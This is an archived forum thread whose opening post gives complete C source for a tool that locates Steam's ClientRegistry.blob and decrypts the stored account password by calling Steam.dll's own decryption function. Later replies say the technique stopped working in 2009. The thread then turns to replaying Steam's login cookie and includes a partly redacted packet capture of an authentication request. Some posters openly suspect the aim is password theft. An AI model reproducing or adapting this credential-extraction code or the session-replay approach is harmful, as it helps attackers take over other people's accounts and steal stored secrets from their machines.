|
Luigi Auriemmaaluigi.org (ARCHIVE-ONLY FORUM!) |
|
It is currently 19 Jul 2012 11:52
|
View unanswered posts | View active topics
|
Page 1 of 1
|
[ 19 posts ] |
|
Author |
Message |
counterstrikewi
|
Post subject: Aluigi's Steampwd converted to C++ [source code here] Posted: 09 May 2009 18:45 |
|
Joined: 19 Apr 2009 23:01 Posts: 13
|
Have a look at this code. It decrypt's the saved Steam Passwords using the Steam.dll. (I've added two functions and cleaned up the source.) If you want to learn something this is your chance. Code: Code: // DecryptStoredSteamPassword.c by wizard // // Combines Luigi's ClientRegistry.blob parsing function(s) // with VALVe's exported SteamDecryptDataForThisMachine() function // // small code changes and comments added by desxor // again some changes and fuctions were added by Five-Three-Nine
#include <stdio.h> #include <stdint.h> #include <string.h> #include <sys/stat.h> #include <windows.h>
void GetSteamDic(char *Path);
void SteamParseEncryptedPassPhrase(uint8_t *fname); uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str);
typedef int (__cdecl *SteamDecryptDataForThisMachine_t)(char *a, int b, char *c, int d, int *e); SteamDecryptDataForThisMachine_t SteamDecryptDataForThisMachine;
int main(int argc, char *argv[]) { HANDLE hSteamDLL;
/* Find Steam Dir */ char SteamPath[100] = {}; char SteamDll[100] = {}; char SteamBlob[100] = {}; char SteamUser[100] = {}; GetSteamDic(SteamPath); strcat(SteamDll,SteamPath); strcat(SteamDll,"\\Steam.dll"); strcat(SteamBlob,SteamPath); strcat(SteamBlob,"\\ClientRegistry.blob"); strcat(SteamUser,SteamPath); strcat(SteamUser,"\\SteamApps\\*"); printf("%s\n%s\n%s\n%s\n\n",SteamPath,SteamDll,SteamBlob,SteamUser); hSteamDLL = LoadLibrary(SteamDll); if(!hSteamDLL) { printf("\nError: the file STEAM.DLL has not been found.\n"); exit(1); }
SteamDecryptDataForThisMachine = (void *)GetProcAddress(hSteamDLL, "SteamDecryptDataForThisMachine"); if(!SteamDecryptDataForThisMachine) { printf("\nError: the function SteamDecryptDataForThisMachine has not been found.\n"); exit(1); }
SteamParseEncryptedPassPhrase(SteamBlob);
FreeLibrary(hSteamDLL); /* Addon: Find Steam Users */ printf("\nSteam User Names:\n"); HANDLE fHandle; WIN32_FIND_DATA wfd;
fHandle=FindFirstFile(SteamUser,&wfd);
do { if (!( (wfd.cFileName[0]=='.') && ( (wfd.cFileName[1]=='.' && wfd.cFileName[2]==0) || wfd.cFileName[1]==0 ) )) { if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { if((strcmp(wfd.cFileName,"SourceMods") != 0) && (strcmp(wfd.cFileName,"common") != 0)) { printf("%s\n",wfd.cFileName); }
} } } while (FindNextFile(fHandle,&wfd)); FindClose(fHandle); return(0); }
void SteamParseEncryptedPassPhrase(uint8_t *fname) { int len, fdsize, pwds; uint16_t nlen; uint8_t *fdbuff, *fdnext, *p, *buff; char decpass[100]; struct stat xstat; FILE *fd;
fd = fopen(fname, "rb"); if(!fd) { printf("Could not open %s for reading/memory search.\n", fname); exit(1); } else { fstat(fileno(fd), &xstat); fdbuff = malloc(xstat.st_size);
if(!fdbuff) { printf("Could not allocate file into memory.\n");
// comments for the following are pretty much the same as below so look there for // a more detailed description of what's going on
len = strlen(fname); fdsize = 64 + len;
fdbuff = malloc(fdsize);
p = fdbuff; p += sprintf(p, "%-30s", "\x50\x68\x72\x61\x73\x65\x01\x50");
*(uint16_t *)p = 0; p += 2;
*(uint32_t *)p = len; p += 4 + 0;
strcpy(p, fname);
fclose(fd); goto next; }
// load our file into memory for searching and reading its data fread(fdbuff, 1, xstat.st_size, fd); fclose(fd);
fdsize = xstat.st_size; } next: fdnext = fdbuff; for(pwds = 0;; pwds++) { // search for unique phrase text using memcmp(), using a great little function provided by Luigi A. // his function will search the entire allocated memory for the data you specify and return with it // if its found, otherwise null
p = find_data(fdnext, fdsize, "\x50\x68\x72\x61\x73\x65\x01\x50");
if(!p) { if(pwds) break; printf("An encrypted and stored password could not be located, exiting.\n"); exit(1); }
// skip 30 bytes past the PHRASE text to the encrypted password until we come // to "04 00" or simply 4, (0x04 + (0x00 * 256)), we now have 24 bytes remaining p += 30;
// this is the 16 bit number we are looking for, save it in the following format: // num = byte1 + (byte2 * 256) nlen = *(uint16_t *)p;
// skip the next 2 bytes of the 16bit number we just saved p += 2;
// after we skipped 2 bytes, we come to 32bit number (4 bytes) which should always be the // size of our encrypted string, it should appear as "5c 00 00 00", which equals 0x5c or simply, 92 // save this in the same format as before len = *(uint32_t *)p;
// now we skip the 4 bytes that we _just read_ PLUS the amount of bytes specified by the first // 16 bit number we just saved, should be 2 bytes anyhow // this should now bring us to our encrypted password located in ClientRegistry.blob which should be // 92 (0x5c) characters long p += 4 + nlen;
// an example of the data, provided by Luigi: // 50 68 72 61 73 65 01 50 7e 00 00 00 00 00 00 00 Phrase.P~....... // 04 00 04 00 00 00 01 00 00 00 02 00 00 00 04 00 ................ // 5c 00 00 00 02 00 00 00 39 41 46 41 42 44 39 36 \.......9AFABD96 // 32 30 43 45 43 34 39 31 46 38 33 44 43 45 31 32 20CEC491F83DCE12 // 36 33 33 44 39 43 44 41 41 44 45 30 42 36 46 46 633D9CDAADE0B6FF // 41 32 42 42 45 30 31 32 45 38 39 32 37 33 36 39 A2BBE012E8927369 // 35 32 35 37 43 44 43 45 39 35 37 32 41 37 30 38 5257CDCE9572A708 // 38 42 32 43 41 43 30 33 37 44 43 38 33 33 36 33 8B2CAC037DC83363 // 33 33 35 35 12 00 2a 00 00 00 43 6c 6f 63 3355..*...Cloc
fdsize -= (p - fdnext); fdnext = p;
// as long as our length is greater than zero but no bigger than fdsize, execute the exported decryption function if((len > 0) && (len < fdsize)) { // null terminate the end of our string, otherwise it will cause problems p[len] = 0;
printf("Found stored encrypted password:\n \"%s\"\n\n", p);
if(!SteamDecryptDataForThisMachine(p, strlen(p), decpass, sizeof(decpass), &len)) { printf("Password: %.*s\n\n", len, decpass); } else { printf("Unable to decrypt the stored password, is this the same machine it was encrypted on?\n"); } } } free(fdbuff); }
uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str) { int strsz; uint8_t *limit;
strsz = strlen(str); limit = buff + buffsz - strsz;
for(; buff <= limit; buff++) { if(!memcmp(buff, str, strsz)) return(buff); } return(NULL); }
void GetSteamDic(char *Path) { HKEY hKey; DWORD size;
RegOpenKey(HKEY_LOCAL_MACHINE, "Software\\Valve\\Steam", &hKey); RegQueryValueEx(hKey, "InstallPath", NULL, NULL,Path, &size); RegCloseKey(hKey); } peace counterstrikewi
|
|
Top |
|
|
|
|
|
|
|
diablosephiroth27
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 11 Oct 2009 12:52 |
|
Joined: 11 Oct 2009 01:08 Posts: 3
|
|
Top |
|
|
Will
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 13 Sep 2010 20:48 |
|
Joined: 13 Sep 2010 20:33 Posts: 8
|
Hello, i??m sorry for pushing this old thread but i cant find the text "Phrase" in the clientregistry.blob. I used a normal Hexeditor and IDA to find this "Phrase.P", .. nothing -.- Code: // an example of the data, provided by Luigi: // 50 68 72 61 73 65 01 50 7e 00 00 00 00 00 00 00 Phrase.P~....... // 04 00 04 00 00 00 01 00 00 00 02 00 00 00 04 00 ................ // 5c 00 00 00 02 00 00 00 39 41 46 41 42 44 39 36 \.......9AFABD96 // 32 30 43 45 43 34 39 31 46 38 33 44 43 45 31 32 20CEC491F83DCE12 // 36 33 33 44 39 43 44 41 41 44 45 30 42 36 46 46 633D9CDAADE0B6FF // 41 32 42 42 45 30 31 32 45 38 39 32 37 33 36 39 A2BBE012E8927369 // 35 32 35 37 43 44 43 45 39 35 37 32 41 37 30 38 5257CDCE9572A708 // 38 42 32 43 41 43 30 33 37 44 43 38 33 33 36 33 8B2CAC037DC83363 // 33 33 35 35 12 00 2a 00 00 00 43 6c 6f 63 3355..*...Cloc
I want to learn that stuff, dont just c&p this, could anyone help me pleace ? Will
|
|
Top |
|
|
aluigi
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 13 Sep 2010 22:18 |
|
Joined: 13 Aug 2007 21:44 Posts: 4068 Location: http://aluigi.org
|
you don't find it because it no longer exists.
from the description of steampwd: "IMPORTANT NOTE: from the 29 Sep 2009 Steam no longer saves the full password so this tool is now totally useless."
|
|
Top |
|
|
Will
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 14 Sep 2010 09:31 |
|
Joined: 13 Sep 2010 20:33 Posts: 8
|
Thanks !,
so the password wont be saved by the steam.dll complete in one string, but its still complete in the clientregistry.blob, right?
Will
|
|
Top |
|
|
Sethioz
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 14 Sep 2010 15:30 |
|
Joined: 24 Sep 2007 02:12 Posts: 1114 Location: http://sethioz.co.uk
|
NO, it does not exist like Luigi said.
|
|
Top |
|
|
Will
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 14 Sep 2010 21:33 |
|
Joined: 13 Sep 2010 20:33 Posts: 8
|
Ok, thanks im sorry.
So when it doesnt exist, how Steam can remember the login-datas itself ? It doesnt store the data on a sql-database, does it ?
Will
|
|
Top |
|
|
Sethioz
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 14 Sep 2010 22:57 |
|
Joined: 24 Sep 2007 02:12 Posts: 1114 Location: http://sethioz.co.uk
|
you was asking about password, not the login data. Luigi have explained this somewhere in detail. basically it works like a password hash. it uses the encrypted password to login it, which is not reversable, it can only be cracked using brute force or by guessing the word (wordlist attack). i cant remember what kind of protocol it used exactly, but thats the idea behind it.
im sure that only reason why you want this, is to plant a trojan into somebody's computer or go to your friend's place and steal their password. so in that case, you can steal their login info, which allows you to log into their account (if you are smart and know what to do), but you can not change password.
|
|
Top |
|
|
SomaFM
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 15 Sep 2010 00:36 |
|
Joined: 16 Aug 2007 06:25 Posts: 367
|
Sethioz wrote: im sure that only reason why you want this, is to plant a trojan into somebody's computer or go to your friend's place and steal their password. so in that case, you can steal their login info, which allows you to log into their account (if you are smart and know what to do), but you can not change password. What proof do you have of that? Who cares what he does it for? There's no need to make assumptions and try to belittle him. Just answer his question and move along.
|
|
Top |
|
|
Will
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 15 Sep 2010 00:40 |
|
Joined: 13 Sep 2010 20:33 Posts: 8
|
Thanks,
At first, i dont want to write any trojan. Im learning about cryptography and realy want to encrypt stuff by myself.
So far that are bad news that this kind of hash is not reversable, however i trust you and give it up -.-
Bruteforcing i think will be detected by the Server anyway.
Thank you guys !
|
|
Top |
|
|
aluigi
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 15 Sep 2010 08:44 |
|
Joined: 13 Aug 2007 21:44 Posts: 4068 Location: http://aluigi.org
|
it's not really an hash, but just a cookie (also known as "ticket" probably) like those used to login on the forums via the browser
|
|
Top |
|
|
Will
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 15 Sep 2010 15:06 |
|
Joined: 13 Sep 2010 20:33 Posts: 8
|
Thanks aluigi!
So when it works like a cookie it have to be stored clientside. So i have read some stuff about that and i know that the username is saved in an encryptet form as a registrykeyname in the ConnectCache.
Now to the value of this key, is this a encryptet form of the password to match with the "hash" serverside? Or is this value generated serverside after the first login and assigned to it? And finaly, witch funktion of the steam.dll is responsible for it?
Thanks !!! , Will
|
|
Top |
|
|
aluigi
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 16 Sep 2010 08:20 |
|
Joined: 13 Aug 2007 21:44 Posts: 4068 Location: http://aluigi.org
|
the cookie is generated server-side, come on it's a cookie :)
for the function it's an internal one, I don't remember to have seen it exported by the dll
|
|
Top |
|
|
Will
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 17 Sep 2010 06:34 |
|
Joined: 13 Sep 2010 20:33 Posts: 8
|
Yes, its a damn cookie (;
Thank you
|
|
Top |
|
|
Sethioz
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 17 Sep 2010 16:57 |
|
Joined: 24 Sep 2007 02:12 Posts: 1114 Location: http://sethioz.co.uk
|
what is your goal ? reverse it ? crack it ? login using the "cookie" ?
|
|
Top |
|
|
Will
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 19 Sep 2010 13:48 |
|
Joined: 13 Sep 2010 20:33 Posts: 8
|
How my goal looks like? - A programm, which starts up and showing your own password or login automaticly.
How it will be done is pretty equal :)
"Reverse it" - is there something to reverse, its a cookie?!? "crack it" - like a bruteforce-attack, i think it would be the last way by everyone or not? "login using the cookie" - if its possible, why not ? :)
Thanks
|
|
Top |
|
|
Sethioz
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 19 Sep 2010 14:54 |
|
Joined: 24 Sep 2007 02:12 Posts: 1114 Location: http://sethioz.co.uk
|
Quote: - A programm, which starts up and showing your own password or login automaticly.
password or login ? which one ? still confusing and what would be the possible purpose of this, if i can ask ?
obviously if you use the same "cookie" that steam, then you can login.
|
|
Top |
|
|
Will
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 19 Sep 2010 18:32 |
|
Joined: 13 Sep 2010 20:33 Posts: 8
|
I??m sorry for my confusing english ;) The program have to show only the password. Or it have to login me, if its possible. You say if i use the same cookie as steam use, i can login.... The strings of a cookie are only visible by "sniffing" them, right ? Found this by using wireshark: Code: 0000 00 04 0e 47 b9 20 00 1a 4d 5b 30 a8 08 00 45 00 ...G. .. M[0...E. 0010 03 7f 69 e4 40 00 80 06 00 00 c0 a8 b2 16 3f e4 ..i.@... ......?. 0020 df 6e ce 86 00 50 76 93 68 4c 85 45 a5 f6 50 18 .n...Pv. hL.E..P. 0030 41 3a 95 83 00 00 50 4f 53 54 20 2f 49 53 74 65 A:....PO ST /ISte 0040 61 6d 55 73 65 72 41 75 74 68 2f 41 75 74 68 65 amUserAu th/Authe 0050 6e 74 69 63 61 74 65 55 73 65 72 2f 76 30 30 30 nticateU ser/v000 0060 31 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 63 6f 6e 1/ HTTP/ 1.1..con 0070 74 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 tent-typ e: appli 0080 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 cation/x -www-for 0090 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a 68 6f m-urlenc oded..ho 00a0 73 74 3a 20 61 70 69 2e 73 74 65 61 6d 70 6f 77 st: api. steampow 00b0 65 72 65 64 2e 63 6f 6d 0d 0a 41 63 63 65 70 74 ered.com ..Accept 00c0 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 2a 2f 2a 3b : text/h tml,*/*; 00d0 71 3d 30 2e 39 0d 0a 41 63 63 65 70 74 2d 45 6e q=0.9..A ccept-En 00e0 63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 69 64 65 coding: gzip,ide 00f0 6e 74 69 74 79 2c 2a 3b 71 3d 30 0d 0a 41 63 63 ntity,*; q=0..Acc 0100 65 70 74 2d 43 68 61 72 73 65 74 3a 20 49 53 4f ept-Char set: ISO 0110 2d 38 38 35 39 2d 31 2c 75 74 66 2d 38 2c 2a 3b -8859-1, utf-8,*; 0120 71 3d 30 2e 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f q=0.7..C onnectio 0130 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 55 n: keep- alive..U 0140 73 65 72 2d 41 67 65 6e 74 3a 20 56 61 6c 76 65 ser-Agen t: Valve 0150 2f 53 74 65 61 6d 20 48 54 54 50 20 43 6c 69 65 /Steam H TTP Clie 0160 6e 74 20 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74 2d nt 1.0.. Content- 0170 4c 65 6e 67 74 68 3a 20 35 32 36 0d 0a 0d 0a 66 Length: 526....f 0180 6f 72 6d 61 74 3d 76 64 66 26 73 74 65 61 6d 69 ormat=vd f&steami 0190 ************************************* d=****** ******** 01a0 35 32 30 26 73 65 73 73 69 6f 6e 6b 65 79 3d 34 ***&sess ionkey=* 01b0 25 41 35 25 42 37 50 25 34 30 25 35 45 6b 25 44 %**%***% **%***%* 01c0 39 *********** 38 25 33 45 25 41 41 7a 25 31 ****************** 01d0 41 4b 25 30 38 5f 25 43 37 25 45 45 25 46 46 25 AK%08_%C 7%EE%FF% 01e0 42 46 25 31 42 25 38 42 25 46 41 25 45 35 25 34 BF%1B%8B %FA%E5%4 01f0 30 25 44 39 25 32 33 2e 25 31 44 25 41 43 25 42 0%D9%23. %1D%AC%B 0200 31 69 6e 25 30 43 4c 25 44 36 4a 25 42 38 25 32 1in%0CL% D6J%B8%2 0210 34 2e 25 38 42 25 31 41 25 31 36 25 31 46 25 46 4.%8B%1A %16%1F%F 0220 35 77 25 38 37 25 38 36 25*******41 41 25 38 ******************** 0230 31 25 38 46 25 37 46 25 45 36 25 33 45 25 46 33 1%8F%7F% E6%3E%F3 0240 25 38 30 25 45 38 25 41 30 25 46 33 25 39 45 25 %80%E8%A 0%F3%9E% 0250 32 32 25 30 44 25 39 39 41 64 37 25 43 41 25 44 22%0D%99 Ad7%CA%D 0260 46 25 38 36 37 59 25 31 42 25 31 39 4a 44 6c 25 F%867Y%1 B%19JDl% 0270 32 33 25 37 45 25 43 35 25 39 37 25 45 37 25 46 23%7E%C5 %97%E7%F 0280 34 25 41 35 25 30 33 25 31 39 25 37 42 25 30 37 4%A5%03% 19%7B%07 0290 25 46 36 68 25 44 45 43 4a 25 35 45 25 43 30 25 %F6h%DEC J%5E%C0% 02a0 43 36 56 25 44 45 25 31 33 25 42 34 39 25 41 45 C6V%DE%1 3%B49%AE 02b0 25 30 45 25 39 31 25 42 31 25 42 36 25 42 38 25 %0E%91%B 1%B6%B8% 02c0 32 43 25 **********************2 33 25 45 ***************** 02d0 43 25 31 43 72 5a 25 41 37 66 25 43 43 25 43 46 C%1CrZ%A 7f%CC%CF 02e0 25 31 45 25 46 32 25 43 31 25 30 35 25 46 32 25 %1E%F2%C 1%05%F2% 02f0 43 37 25 38 45 26 65 6e 63 72 79 70 74 65 64 5f C7%8E&en crypted_ 0300 6c 6f 67 69 6e 6b 65 79 3d 25 43 32 25 32 37 25 loginkey =******* 0310 30 4**************1 25 38 44 25 38 30 25 45 ***************** 0320 30 64 25 46 31 25 45 39 65 25 46 34 25 43 42 25 0d%F1%E9 e%F4%CB% 0330 31 37 25 41 35 25 32 32 25 41 45 25 32 35 25 43 17%A5%22 %AE%25%C 0340 36 25 32 38 25 45 41 25 39 35 25 38 38 25 41 31 6%28%EA% 95%88%A1 0350 59 25 39 46 25 39 39 25 33 44 6a 25 41 39 25 43 Y%9F%99% 3Dj%A9%C 0360 31 4e ************************38 35 25 32 ****************** 0370 .. .. .. . . . . . 0380 ...
And recieve this: Code: a uthentic 0040 61 74 65 75 73 65 72 22 0a 7b 0a 09 22 74 6f 6b ateuser" .{.."tok 0050 65 6e 22 09 22 37 36 35 36 31 31 39 37 39 38 34 en"."*** 61197*** ...
I??m on the right way? Thanks
|
|
Top |
|
|
Sethioz
|
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 20 Sep 2010 17:49 |
|
Joined: 24 Sep 2007 02:12 Posts: 1114 Location: http://sethioz.co.uk
|
as explained, you can not show the password. obviously you can log user in, cuz credentials are saved somewhere. Luigi has to answer you about that part.
i still do not understand, what is the purpose of this ? if you save credentials on steam, it logs you in automatically.
|
|
Top |
|
|
|
Page 1 of 1
|
[ 19 posts ] |
|
|
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot post attachments in this forum
|
|